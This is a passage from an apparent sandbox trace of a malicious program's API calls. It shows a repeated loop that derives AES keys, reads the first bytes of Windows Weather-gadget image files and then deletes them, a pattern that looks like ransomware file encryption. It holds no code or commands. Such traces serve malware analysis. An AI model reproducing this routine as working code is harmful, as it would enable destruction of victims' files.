lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.604] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.604] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.604] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.605] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-gibbous_partly-cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-gibbous_partly-cloudy.png")) returned 0 [0195.608] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.609] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.609] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.609] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.609] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x22a6 [0195.609] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.613] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.613] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.613] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.614] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-crescent.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-crescent.png")) returned 0 [0195.615] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.615] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.615] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.615] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.615] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2b1e [0195.615] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.619] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.619] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.619] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.620] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-crescent_partly-cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-crescent_partly-cloudy.png")) returned 0 [0195.623] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.623] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.623] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.623] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.623] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2203 [0195.623] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.626] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.626] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.626] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.628] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-gibbous.png")) returned 0 [0195.628] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.629] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.629] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.629] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.629] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2b5d [0195.629] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.640] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.640] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.640] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.642] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png")) returned 0 [0195.672] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.673] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.673] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.673] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.673] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3173 [0195.673] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.676] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.676] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.676] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.678] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_rainy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_rainy.png")) returned 0 [0195.678] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.678] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.678] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.678] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.679] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3369 [0195.679] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.682] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.682] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.682] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.683] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_snow.png")) returned 0 [0195.684] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.684] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.684] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.684] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.685] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2fcf [0195.685] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.687] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.687] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.687] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.689] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png")) returned 0 [0195.689] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.690] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.690] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.690] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.690] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3229 [0195.690] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.693] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.693] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.693] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.694] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png")) returned 0 [0195.695] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.696] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.696] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.696] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.696] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x21a1 [0195.696] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.699] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.699] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.699] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.700] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_partly-cloudy.png")) returned 0 [0195.701] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.701] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.701] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.701] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.701] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ea3 [0195.701] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.708] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.708] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.708] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.709] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_snow.png")) returned 0 [0195.711] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.711] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.711] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.711] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.712] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ce5 [0195.712] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.755] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.755] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.755] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.756] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_sun.png")) returned 0 [0195.765] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.765] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.765] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.765] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.765] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x32c6 [0195.765] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.771] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.771] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.771] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.772] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_windy.png")) returned 0 [0195.773] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.773] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.774] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.774] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.774] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2929 [0195.774] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.777] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.777] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.777] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.778] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_cloudy.png")) returned 0 [0195.778] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.779] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.779] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.779] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.779] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x29d0 [0195.779] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.782] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.782] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.782] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.783] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_few-showers.png")) returned 0 [0195.784] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.785] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.785] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.785] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.785] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x273c [0195.785] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.788] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.788] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.788] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.789] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_foggy.png")) returned 0 [0195.789] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.790] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.790] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.790] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.790] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3071 [0195.790] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.793] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.793] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.793] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.795] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_hail.png")) returned 0 [0195.797] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.797] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.797] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.797] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.797] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3253 [0195.797] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.823] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.823] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.823] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.825] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_rainy.png")) returned 0 [0195.825] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.826] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.826] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.826] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.826] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x32ae [0195.826] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.829] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.829] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.829] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.831] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png" (normalized: "c:\\program files\\windows 